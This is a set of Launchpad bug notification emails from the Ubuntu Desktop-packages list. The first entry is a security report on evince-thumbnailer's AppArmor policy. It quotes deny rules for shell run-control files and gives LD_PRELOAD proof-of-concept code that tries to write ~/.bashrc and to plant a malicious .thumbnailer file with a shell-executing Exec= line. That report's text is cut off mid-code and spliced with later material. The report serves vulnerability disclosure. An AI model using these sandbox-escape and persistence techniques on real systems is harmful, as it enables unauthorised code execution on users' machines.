[Desktop-packages] [Bug 1788929] Re: Debian/Ubuntu AppArmor policy gaps in evince
Ubuntu 14.04 LTS is now out of standard support and evince is not included in ESM. ** Changed in: evince (Ubuntu Trusty) Status: In Progress => Won't Fix -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1788929 Title: Debian/Ubuntu AppArmor policy gaps in evince Status in AppArmor: Fix Released Status in apparmor package in Ubuntu: Fix Released Status in evince package in Ubuntu: Fix Released Status in apparmor source package in Trusty: Fix Released Status in evince source package in Trusty: Won't Fix Status in apparmor source package in Xenial: Fix Released Status in evince source package in Xenial: In Progress Status in apparmor source package in Bionic: Fix Released Status in evince source package in Bionic: In Progress Status in apparmor source package in Cosmic: Fix Released Status in evince source package in Cosmic: Fix Released Bug description: [Note on coordination: I'm reporting this as a security bug to both Ubuntu (because Ubuntu is where this policy originally comes from, and Ubuntu is also where AppArmor is most relevant) and Debian (because the AppArmor policy has been merged into Debian's version of the package). It isn't clear to me who really counts as upstream here...] Debian/Ubuntu ship with an AppArmor policy for evince, which, among other things, restricts evince-thumbnailer. The Ubuntu security team seems to incorrectly believe that this policy provides meaningful security isolation: https://twitter.com/alex_murray/status/1032780425834446849 https://twitter.com/alex_murray/status/1032796879640190976 This AppArmor policy seems to be designed to permit everything that evince-thumbnailer might need; however, it does not seem to be designed to establish a consistent security boundary around evince-thumbnailer. For example, read+write access to almost the entire home directory is granted: /usr/bin/evince-thumbnailer { [...] # Lenient, but remember we still have abstractions/private-files-strict in # effect). @{HOME}/ r, owner @{HOME}/** rw, owner /media/** rw, } As the comment notes, a couple files are excluded to prevent you from just overwriting well-known executable scripts in the user's home directory, like ~/.bashrc: [...] # don't allow reading/updating of run control files deny @{HOME}/.*rc mrk, audit deny @{HOME}/.*rc wl, # bash deny @{HOME}/.bash* mrk, audit deny @{HOME}/.bash* wl, deny @{HOME}/.inputrc mrk, audit deny @{HOME}/.inputrc wl, [...] Verification: user@ubuntu-18-04-vm:~$ cat preload2.c #define _GNU_SOURCE #include #include #include #include #include #include #include #include __attribute__((constructor)) static void entry(void) { printf("constructor running from %s\n", program_invocation_name); int fd = open("/home/user/.bashrc", O_WRONLY); if (fd != -1) { printf("success\n"); } else { perror("open .bashrc"); } exit(0); } user@ubuntu-18-04-vm:~$ sudo gcc -shared -o /usr/lib/x86_64-linux-gnu/libevil_preload.so preload2.c -fPIC user@ubuntu-18-04-vm:~$ LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libevil_preload.so evince-thumbnailer constructor running from evince-thumbnailer open .bashrc: Permission denied user@ubuntu-18-04-vm:~$ dmesg|tail -n1 [ 6900.355399] audit: type=1400 audit(1535126396.280:113): apparmor="DENIED" operation="open" profile="/usr/bin/evince-thumbnailer" name="/home/user/.bashrc" pid=4807 comm="evince-thumbnai" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000 But of course blacklists are brittle and often trivially bypassable. For example, did you know that it is possible to override the system's thumbnailers by dropping .thumbnailer files in ~/.local/share/ ? .thumbnailer files contain command lines that will be executed by nautilus. To demonstrate that it is possible to create .thumbnailer files from evince-thumbnailer: user@ubuntu-18-04-vm:~$ ls -la .local/share/thumbnailers/ ls: cannot access '.local/share/thumbnailers/': No such file or directory user@ubuntu-18-04-vm:~$ cat preload3.c #define _GNU_SOURCE #include #include #include #include #include #include #include #include __attribute__((constructor)) static void entry(void) { printf("constructor running from %s\n", program_invocation_name); if (mkdir("/home/user/.local/share/thumbnailers", 0777) && errno != EEXIST) err(1, "mkdir"); FILE *f = fopen("/home/user/.local/share/thumbnailers/evil.thumbnailer", "w"); if (!f) err(1, "create"); fputs("[Thumbnailer Entry]\n", f); fputs("Exec=find /etc/passwd -name passwd -exec gnome-terminal -- sh -c id;cat [...] } As a comment in abstractions/dbus-session explains: # This abstraction grants full session bus access.
[Desktop-packages] [Bug 1831368] [NEW] Deja-dup asks to install software from un-trusted sources
Public bug reported: When setting up deja-dup to backup to Google drive, it says that dulicity & python-gi are not installed (this is expected). It gives the option to install these packages, but the system warns that they are from an untrusted source. Installing the same packages from terminal raises no such warnings. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: deja-dup 37.1-2fakesync1ubuntu0.1 ProcVersionSignature: Ubuntu 4.18.0-20.21~18.04.1-generic 4.18.20 Uname: Linux 4.18.0-20-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.6 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Sun Jun 2 12:28:52 2019 InstallationDate: Installed on 2019-05-28 (4 days ago) InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 (20190210) ProcEnviron: LANGUAGE=en_GB:en PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_GB.UTF-8 SHELL=/bin/bash SourcePackage: deja-dup UpgradeStatus: No upgrade log present (probably fresh install) ** Affects: deja-dup (Ubuntu) Importance: Undecided Status: New ** Tags: amd64 apport-bug bionic -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to deja-dup in Ubuntu. https://bugs.launchpad.net/bugs/1831368 Title: Deja-dup asks to install software from un-trusted sources Status in deja-dup package in Ubuntu: New Bug description: When setting up deja-dup to backup to Google drive, it says that dulicity & python-gi are not installed (this is expected). It gives the option to install these packages, but the system warns that they are from an untrusted source. Installing the same packages from terminal raises no such warnings. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: deja-dup 37.1-2fakesync1ubuntu0.1 ProcVersionSignature: Ubuntu 4.18.0-20.21~18.04.1-generic 4.18.20 Uname: Linux 4.18.0-20-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.6 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Sun Jun 2 12:28:52 2019 InstallationDate: Installed on 2019-05-28 (4 days ago) InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 (20190210) ProcEnviron: LANGUAGE=en_GB:en PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_GB.UTF-8 SHELL=/bin/bash SourcePackage: deja-dup UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/deja-dup/+bug/1831368/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
@Christina - I suggest filing a new bug with more specifics. That said, I suspect you have a .dpkg-dist file in /etc/apparmor.d or /etc/apparmor.d/abstractions that has changes that need to be merged into your evince profile. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1798091 Title: thumbnailer cannot create tempfiles (with apparmor denials) Status in evince package in Ubuntu: Fix Released Status in evince source package in Cosmic: Fix Released Status in evince source package in Disco: Fix Released Status in evince package in Debian: Fix Released Bug description: * Impact Nautilus fails to generate previews for pdf files * Test case Download/copy a pdf, open the directory in nautilus, a preview image should be displayed * Regression potential Check that there are no other apparmor denials and the thumbnailer works - While trying to create thumbnails in a directory from within nautilus, I got: [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.1-1 ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7 Uname: Linux 4.18.0-8-generic x86_64 ApportVersion: 2.20.10-0ubuntu13 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 16 14:59:00 2018 InstallationDate: Installed on 2014-06-19 (1580 days ago) InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1798091/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1724793] Re: Error localization
** Package changed: ufw (Ubuntu) => language-selector (Ubuntu) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to language-selector in Ubuntu. https://bugs.launchpad.net/bugs/1724793 Title: Error localization Status in language-selector package in Ubuntu: New Bug description: After some manipulation of the system interface of the OS was in English, as all the default startup application. I tried to change the locale via GUI, however, everything on the ground. --- После некоторых манипуляций с системой интерфейс ОС стал на английском, как и все запускаемые по умолчанию приложения. Пробовал изменить локаль через ГУИ, однако там всё на местах. locale LANG=ru_RU.UTF-8 LANGUAGE=C.UTF-8 LC_CTYPE="ru_RU.UTF-8" LC_NUMERIC="ru_RU.UTF-8" LC_TIME="ru_RU.UTF-8" LC_COLLATE="ru_RU.UTF-8" LC_MONETARY="ru_RU.UTF-8" LC_MESSAGES="ru_RU.UTF-8" LC_PAPER="ru_RU.UTF-8" LC_NAME="ru_RU.UTF-8" LC_ADDRESS="ru_RU.UTF-8" LC_TELEPHONE="ru_RU.UTF-8" LC_MEASUREMENT="ru_RU.UTF-8" LC_IDENTIFICATION="ru_RU.UTF-8" LC_ALL=ru_RU.UTF-8 locale -a C C.UTF-8 en_AG en_AG.utf8 en_AU.utf8 en_BW.utf8 en_CA.utf8 en_DK.utf8 en_GB.utf8 en_HK.utf8 en_IE.utf8 en_IN en_IN.utf8 en_NG en_NG.utf8 en_NZ.utf8 en_PH.utf8 en_SG.utf8 en_US.utf8 en_ZA.utf8 en_ZM en_ZM.utf8 en_ZW.utf8 POSIX ru_RU.utf8 ru_UA.utf8 cat /etc/default/locale # File generated by update-locale LANG="ru_RU.UTF-8" LANGUAGE="ru:en" LC_NUMERIC="ru_RU.UTF-8" LC_TIME="ru_RU.UTF-8" LC_MONETARY="ru_RU.UTF-8" LC_PAPER="ru_RU.UTF-8" LC_IDENTIFICATION="ru_RU.UTF-8" LC_NAME="ru_RU.UTF-8" LC_ADDRESS="ru_RU.UTF-8" LC_TELEPHONE="ru_RU.UTF-8" LC_MEASUREMENT="ru_RU.UTF-8" nano ~/.bashrc # ~/.bashrc: executed by bash(1) for non-login shells. # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) # for examples #export LC_xxx=C.UTF-8 export LC_ALL=ru_RU.UTF-8 ... To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/language-selector/+bug/1724793/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1792835] Re: Bash completion for Inkscape does not work
The ufw bug is being tracking in bug 1775043. Removing that task. ** No longer affects: ufw (Ubuntu) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to jackd2 in Ubuntu. https://bugs.launchpad.net/bugs/1792835 Title: Bash completion for Inkscape does not work Status in apt-xapian-index package in Ubuntu: New Status in cowdancer package in Ubuntu: Fix Committed Status in dpatch package in Ubuntu: New Status in inkscape package in Ubuntu: Fix Released Status in jackd2 package in Ubuntu: New Bug description: Bash completion for Inkscape does not work in Ubuntu 18.04. It will for example suggest non-svg files. The reason seems to be that /usr/share/bash- completion/completions/inkscape uses the have() function, which is temporarily defined in /usr/share/bash-completion/bash_completion, but then unset at the end of that file. Workaround: Copy /usr/share/bash-completion/completions/inkscape to ~/.local/share/bash-completion/completions/inkscape and remove the uses of "have". The bash completion for some other commands seem to use have() too, e.g. jackd, ufw, cowbuilder, dpatch_edit_patch, and axi-cache, so bash completion for these commands will presumably not work either. From /usr/share/bash-completion/bash_completion: - # Backwards compatibility for compat completions that use have(). # @deprecated should no longer be used; generally not needed with dynamically # loaded completions, and _have is suitable for runtime use. have() { unset -v have _have $1 && have=yes } [...] unset -f have unset have - From /usr/share/bash-completion/completions/inkscape: - [...] have inkscape && _inkscape() { [...] } [ "${have:-}" ] && complete -F _inkscape $filenames inkscape - System information: $ lsb_release -rd Description: Ubuntu 18.04.1 LTS Release: 18.04 $ apt-cache policy inkscape inkscape: Installed: 0.92.3-1 Candidate: 0.92.3-1 Version table: *** 0.92.3-1 500 500 http://no.archive.ubuntu.com/ubuntu bionic/universe amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apt-xapian-index/+bug/1792835/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1808264] Re: caldav free-busy query is broken
Whoops, misinterpreted the version numbering scheme and accidentally submitted a patch numbered for 18.04.2! ** Patch added: "Patch with correct version number" https://bugs.launchpad.net/ubuntu/+source/evolution-data-server/+bug/1808264/+attachment/5221828/+files/2-3.28.5-0ubuntu1.18.04.1.debdiff -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evolution-data-server in Ubuntu. https://bugs.launchpad.net/bugs/1808264 Title: caldav free-busy query is broken Status in evolution-data-server package in Ubuntu: New Bug description: A couple of bugs are present which make CalDAV scheduling effectively useless - the combined effect of them is that everyone else shows as having your availability information, rather than their own. I have patched the bugs upstream, and they have been merged into the branches for both 3.30.4 and 3.31.4: * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/8 * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/7 I'm hoping to backport these patches to bionic, which packages 3.28 -- I will submit such a debdiff later today. I am submitting here rather than to Debian as the versions of this package in Debian are out of lockstep with Ubuntu's, so the patch doesn't cleanly transfer -- let me know if this is the wrong approach. Cosmic is on the 3.30 release series, which I assume means the fix will come from upstream and doesn't need to be applied here, but let me know if I should do a patch for that as well. Thanks :) ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: evolution-data-server 3.28.5-0ubuntu0.18.04.1 ProcVersionSignature: Ubuntu 4.15.0-42.45-generic 4.15.18 Uname: Linux 4.15.0-42-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.5 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Wed Dec 12 22:05:38 2018 InstallationDate: Installed on 2018-12-10 (1 days ago) InstallationMedia: Ubuntu 18.04.1 LTS "Bionic Beaver" - Release amd64 (20180725) SourcePackage: evolution-data-server UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evolution-data-server/+bug/1808264/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1808264] Re: caldav free-busy query is broken
I have added a patch which applies both upstream merge requests linked above. I was not above to successfully set up pbuilder, but built and tested it successfully with debuild in a bionic VM. Subscribing ubuntu- sru in accordance with http://packaging.ubuntu.com/html/security-and- stable-release-updates.html as I'm pretty sure the change I'm requesting would be a stable release update. Aiming justify that update: this is a significant regression because somewhere between Xenial and Bionic, this caldav freebusy code was rewritten and broken. Additionally somewhere in that timeframe the behavior changed from using the address book's FBURL to using this caldav-based technique (which, again, doesn't work :) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evolution-data-server in Ubuntu. https://bugs.launchpad.net/bugs/1808264 Title: caldav free-busy query is broken Status in evolution-data-server package in Ubuntu: New Bug description: A couple of bugs are present which make CalDAV scheduling effectively useless - the combined effect of them is that everyone else shows as having your availability information, rather than their own. I have patched the bugs upstream, and they have been merged into the branches for both 3.30.4 and 3.31.4: * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/8 * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/7 I'm hoping to backport these patches to bionic, which packages 3.28 -- I will submit such a debdiff later today. I am submitting here rather than to Debian as the versions of this package in Debian are out of lockstep with Ubuntu's, so the patch doesn't cleanly transfer -- let me know if this is the wrong approach. Cosmic is on the 3.30 release series, which I assume means the fix will come from upstream and doesn't need to be applied here, but let me know if I should do a patch for that as well. Thanks :) ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: evolution-data-server 3.28.5-0ubuntu0.18.04.1 ProcVersionSignature: Ubuntu 4.15.0-42.45-generic 4.15.18 Uname: Linux 4.15.0-42-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.5 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Wed Dec 12 22:05:38 2018 InstallationDate: Installed on 2018-12-10 (1 days ago) InstallationMedia: Ubuntu 18.04.1 LTS "Bionic Beaver" - Release amd64 (20180725) SourcePackage: evolution-data-server UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evolution-data-server/+bug/1808264/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1808264] Re: caldav free-busy query is broken
** Patch added: "Patch for this issue" https://bugs.launchpad.net/ubuntu/+source/evolution-data-server/+bug/1808264/+attachment/5221827/+files/1-3.28.5-0ubuntu0.18.04.2.debdiff -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evolution-data-server in Ubuntu. https://bugs.launchpad.net/bugs/1808264 Title: caldav free-busy query is broken Status in evolution-data-server package in Ubuntu: New Bug description: A couple of bugs are present which make CalDAV scheduling effectively useless - the combined effect of them is that everyone else shows as having your availability information, rather than their own. I have patched the bugs upstream, and they have been merged into the branches for both 3.30.4 and 3.31.4: * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/8 * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/7 I'm hoping to backport these patches to bionic, which packages 3.28 -- I will submit such a debdiff later today. I am submitting here rather than to Debian as the versions of this package in Debian are out of lockstep with Ubuntu's, so the patch doesn't cleanly transfer -- let me know if this is the wrong approach. Cosmic is on the 3.30 release series, which I assume means the fix will come from upstream and doesn't need to be applied here, but let me know if I should do a patch for that as well. Thanks :) ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: evolution-data-server 3.28.5-0ubuntu0.18.04.1 ProcVersionSignature: Ubuntu 4.15.0-42.45-generic 4.15.18 Uname: Linux 4.15.0-42-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.5 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Wed Dec 12 22:05:38 2018 InstallationDate: Installed on 2018-12-10 (1 days ago) InstallationMedia: Ubuntu 18.04.1 LTS "Bionic Beaver" - Release amd64 (20180725) SourcePackage: evolution-data-server UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evolution-data-server/+bug/1808264/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1808264] [NEW] caldav free-busy query is broken
Public bug reported: A couple of bugs are present which make CalDAV scheduling effectively useless - the combined effect of them is that everyone else shows as having your availability information, rather than their own. I have patched the bugs upstream, and they have been merged into the branches for both 3.30.4 and 3.31.4: * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/8 * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/7 I'm hoping to backport these patches to bionic, which packages 3.28 -- I will submit such a debdiff later today. I am submitting here rather than to Debian as the versions of this package in Debian are out of lockstep with Ubuntu's, so the patch doesn't cleanly transfer -- let me know if this is the wrong approach. Cosmic is on the 3.30 release series, which I assume means the fix will come from upstream and doesn't need to be applied here, but let me know if I should do a patch for that as well. Thanks :) ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: evolution-data-server 3.28.5-0ubuntu0.18.04.1 ProcVersionSignature: Ubuntu 4.15.0-42.45-generic 4.15.18 Uname: Linux 4.15.0-42-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.5 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Wed Dec 12 22:05:38 2018 InstallationDate: Installed on 2018-12-10 (1 days ago) InstallationMedia: Ubuntu 18.04.1 LTS "Bionic Beaver" - Release amd64 (20180725) SourcePackage: evolution-data-server UpgradeStatus: No upgrade log present (probably fresh install) ** Affects: evolution-data-server (Ubuntu) Importance: Undecided Status: New ** Tags: amd64 apport-bug bionic -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evolution-data-server in Ubuntu. https://bugs.launchpad.net/bugs/1808264 Title: caldav free-busy query is broken Status in evolution-data-server package in Ubuntu: New Bug description: A couple of bugs are present which make CalDAV scheduling effectively useless - the combined effect of them is that everyone else shows as having your availability information, rather than their own. I have patched the bugs upstream, and they have been merged into the branches for both 3.30.4 and 3.31.4: * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/8 * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/7 I'm hoping to backport these patches to bionic, which packages 3.28 -- I will submit such a debdiff later today. I am submitting here rather than to Debian as the versions of this package in Debian are out of lockstep with Ubuntu's, so the patch doesn't cleanly transfer -- let me know if this is the wrong approach. Cosmic is on the 3.30 release series, which I assume means the fix will come from upstream and doesn't need to be applied here, but let me know if I should do a patch for that as well. Thanks :) ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: evolution-data-server 3.28.5-0ubuntu0.18.04.1 ProcVersionSignature: Ubuntu 4.15.0-42.45-generic 4.15.18 Uname: Linux 4.15.0-42-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.5 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Wed Dec 12 22:05:38 2018 InstallationDate: Installed on 2018-12-10 (1 days ago) InstallationMedia: Ubuntu 18.04.1 LTS "Bionic Beaver" - Release amd64 (20180725) SourcePackage: evolution-data-server UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evolution-data-server/+bug/1808264/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1750069] Re: [MIR] xdg-desktop-portal-gtk
Marked the xenial and bionic tasks as incomplete. Seth gave some guidance but the desktop team needs to respond on how to handle it before anything is done with the seeding. ** Changed in: xdg-desktop-portal-gtk (Ubuntu Xenial) Status: New => Incomplete ** Changed in: xdg-desktop-portal-gtk (Ubuntu Bionic) Status: New => Incomplete -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xdg-desktop-portal-gtk in Ubuntu. https://bugs.launchpad.net/bugs/1750069 Title: [MIR] xdg-desktop-portal-gtk Status in xdg-desktop-portal-gtk package in Ubuntu: Fix Released Status in xdg-desktop-portal-gtk source package in Xenial: Incomplete Status in xdg-desktop-portal-gtk source package in Bionic: Incomplete Bug description: Availability Actively maintained in debian and we'll sync from debian again when 0.10 is avaiable. Built for all supported architectures. Rationale = Required for snaps. Security No known security issues, but due to the nature of this package, a security review is probably needed. https://security-tracker.debian.org/tracker/source-package/xdg-desktop-portal-gtk https://launchpad.net/xdg-desktop-portal-gtk/+cve Quality assurance = - The Desktop Packages bug team is subscribed. https://bugs.launchpad.net/ubuntu/+source/xdg-desktop-portal-gtk https://bugs.debian.org/cgi-bin/pkgreport.cgi?src=xdg-desktop-portal-gtk https://github.com/flatpak/xdg-desktop-portal-gtk/issues Dependencies No universe binary dependencies Standards compliance 4.1.3 debhelper compat 10, dh 7 style simple rules Maintenance === - Actively developed upstream. Last release was 0.10, this week. https://github.com/flatpak/xdg-desktop-portal-gtk/commits/master Well-maintained in Debian by Simon McVittie (Debian's Flatpak maintainer). Team-maintained. https://salsa.debian.org/debian/xdg-desktop-portal-gtk Background information == This is needed to make xdg-desktop-portal useful in Ubuntu Desktop. See xdg-desktop-portal MIR bug LP: #1749672 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xdg-desktop-portal-gtk/+bug/1750069/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1643910] Re: BAMF_DESKTOP_FILE_HINT not set in correct place for unity7
Actually, there is https://bugs.launchpad.net/bamf/+bug/1747802 which is fixed. I checked the code and this should be resolved. Marking as fixed. ** Changed in: bamf (Ubuntu) Status: Triaged => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to bamf in Ubuntu. https://bugs.launchpad.net/bugs/1643910 Title: BAMF_DESKTOP_FILE_HINT not set in correct place for unity7 Status in Snappy: Triaged Status in bamf package in Ubuntu: Fix Released Bug description: Occasionally when I pin items to the Unity7 launcher, the BAMF code (as I'm told) incorrectly matches to /snap/app/revision/ This is a security issue because the Exec= line points to /snap/app/revision/... which bypasses snap run (/snap/bin/...) and therefore snap-confine. I'm told by Marcus (aka, 3v1n0 aka Trevinho) that this is because BAMF_DESKTOP_FILE_HINT is not exported by snap env and instead only injected in the desktop file that is created in /var/lib/snapd/desktop/applications upon snap install. This means that the wrong Exec= (ie, where it points to the binary) may occur in two places: 1. when launching /snap/bin/... from the command line 2. when something in /var/lib/snapd/desktop/applications/*.desktop doesn't match properly In both cases, the initial launch is fine, but pinning the icon to the launcher results in the wrong entry in the Exec= line and launching from this pinned launcher entry after is unconfined. You can check by doing: 1. launch application from the dash 2. run sudo aa-status and see if it is launched under confinement 3. pin the icon that is in the launcher 4. close the application, then launch from the pinned icon 5. run sudo aa-status and see if it is launched under confinement This doesn't happen all the time. For example, vlc seems to work fine both from the command line and from launching via a pinned launcher entry. chrome-test on the other hand doesn't seem to work with either. Related https://github.com/snapcore/snapd/pull/1580 -- puts BAMF_DESKTOP_FILE_HINT in the desktop file instead of in the environment, but Marco requested that this change (https://github.com/snapcore/snapd/pull/1580#issuecomment-234546220). https://trello.com/c/xP1hN3BF/152-improve-desktop-file-support-by- adding-a-new-bamf-desktop-file-hint-environment-hint also discussed this issue, but the card is archived and therefore it won't be worked on. I'm having trouble finding a simple reproducer (other than chrome- test) but am told by Marco that the BAMF matching will always work if BAMF_DESKTOP_FILE_HINT in the process' environment always points to the desktop file in /var/lib/snapd/desktop/applications. I will continue to look for a simple reproducer. To manage notifications about this bug go to: https://bugs.launchpad.net/snappy/+bug/1643910/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1643910] Re: BAMF_DESKTOP_FILE_HINT not set in correct place for unity7
Is there any more progress on this? -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to bamf in Ubuntu. https://bugs.launchpad.net/bugs/1643910 Title: BAMF_DESKTOP_FILE_HINT not set in correct place for unity7 Status in Snappy: Triaged Status in bamf package in Ubuntu: Triaged Bug description: Occasionally when I pin items to the Unity7 launcher, the BAMF code (as I'm told) incorrectly matches to /snap/app/revision/ This is a security issue because the Exec= line points to /snap/app/revision/... which bypasses snap run (/snap/bin/...) and therefore snap-confine. I'm told by Marcus (aka, 3v1n0 aka Trevinho) that this is because BAMF_DESKTOP_FILE_HINT is not exported by snap env and instead only injected in the desktop file that is created in /var/lib/snapd/desktop/applications upon snap install. This means that the wrong Exec= (ie, where it points to the binary) may occur in two places: 1. when launching /snap/bin/... from the command line 2. when something in /var/lib/snapd/desktop/applications/*.desktop doesn't match properly In both cases, the initial launch is fine, but pinning the icon to the launcher results in the wrong entry in the Exec= line and launching from this pinned launcher entry after is unconfined. You can check by doing: 1. launch application from the dash 2. run sudo aa-status and see if it is launched under confinement 3. pin the icon that is in the launcher 4. close the application, then launch from the pinned icon 5. run sudo aa-status and see if it is launched under confinement This doesn't happen all the time. For example, vlc seems to work fine both from the command line and from launching via a pinned launcher entry. chrome-test on the other hand doesn't seem to work with either. Related https://github.com/snapcore/snapd/pull/1580 -- puts BAMF_DESKTOP_FILE_HINT in the desktop file instead of in the environment, but Marco requested that this change (https://github.com/snapcore/snapd/pull/1580#issuecomment-234546220). https://trello.com/c/xP1hN3BF/152-improve-desktop-file-support-by- 